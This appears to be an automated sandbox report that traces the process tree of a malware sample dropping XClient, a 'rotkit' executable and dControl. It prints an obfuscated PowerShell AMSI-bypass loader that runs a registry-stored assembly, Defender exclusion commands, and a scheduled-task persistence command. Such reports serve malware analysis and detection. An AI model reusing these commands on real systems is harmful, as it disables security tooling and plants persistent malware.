The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8c7edfd2-a4e5-41af-8edf-91f025b5b39a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1184

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1108
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KdEwxYVDnpWT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JZhxlpDURoYORR,[Parameter(Position=1)][Type]$JuXdxXTaTy)$YCzGKVoIVUf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$YCzGKVoIVUf.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+'By'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$JZhxlpDURoYORR).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+'m'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$YCzGKVoIVUf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+'By'+'S'+'i'+[Char](103)+','+'N'+'e'+[Char](119)+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JuXdxXTaTy,$JZhxlpDURoYORR).SetImplementationFlags(''+[Char](82)+''+'u'+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $YCzGKVoIVUf.CreateType();}$phJloYXxTIFUk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+'n'+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$WtjkcifhdSwNkG=$phJloYXxTIFUk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TtWRDmNZXtinVHqCVBg=KdEwxYVDnpWT @([String])([IntPtr]);$JrMbzHyrVTPQrnGCwEZwlA=KdEwxYVDnpWT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BIIPFDHJULU=$phJloYXxTIFUk.GetMethod(''+[Char](71)+'e'+'t'+'M'+'o'+''+'d'+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'ne'+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$NDvdOkgwhXCmJg=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UwzAzAaCNMvsSnNUc=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$BvvrjJC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDvdOkgwhXCmJg,$TtWRDmNZXtinVHqCVBg).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$kRbIEpScGmqPTFtjX=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BvvrjJC,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$mUyKlkFWZr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,4,[ref]$mUyKlkFWZr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kRbIEpScGmqPTFtjX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,0x20,[ref]$mUyKlkFWZr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- C:\Users\Public\www.XClient.exe
  C:\Users\Public\www.XClient.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2448
- C:\Users\Public\www.XClient.exe
  C:\Users\Public\www.XClient.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2716

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2912

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3432

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3460
- C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
  "C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Users\Public\dControl.exe
    "C:\Users\Public\dControl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
  - - C:\Users\Public\dControl.exe
      C:\Users\Public\dControl.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4024
    - - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /TI
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3948
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:2144
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2732
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3204
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5008
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:1528
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1512
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3304
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4276
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:4488
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4892
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:1504
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1580
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3052
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3056
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:392
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4344
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3956
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3668
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:5036
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3144
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:2036
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2296
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:2824
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1384
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:1808
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2628
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3392
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1196
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:4924
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5060
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:1404
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4376
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:5108
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2600
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3140
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3852
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:4416
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4368
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:4312
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1852
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:1160
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:976
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:3992
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4564
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:2396
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:592
      - C:\Windows\Explorer.exe
        
        "C:\Windows\Explorer.exe" windowsdefender:
        6⤵
        
        PID:5080
      - C:\Users\Public\dControl.exe
        
        "C:\Users\Public\dControl.exe" /EXP |3460|
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4848
- - C:\Users\Public\www.rotkit.exe
    "C:\Users\Public\www.rotkit.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:740
  - - C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe
      C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:5060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ba25650.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
- - C:\Users\Public\www.XClient.exe
    "C:\Users\Public\www.XClient.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2096
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4196
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4344
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2576
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:1832
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3228
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.XClient" /tr "C:\Users\Public\www.XClient.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2568
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3676

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2384

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3520

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4780

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:968

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2404

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3424

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5072

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2312

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:556

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe f8a62276c72d688d761415af97fa9ae4 31s49A6LFk287LekuUJ4Yw.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1964
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2952

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:2216

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:2656

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1608

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4556

C:\Windows\system32\OpenWith.exe
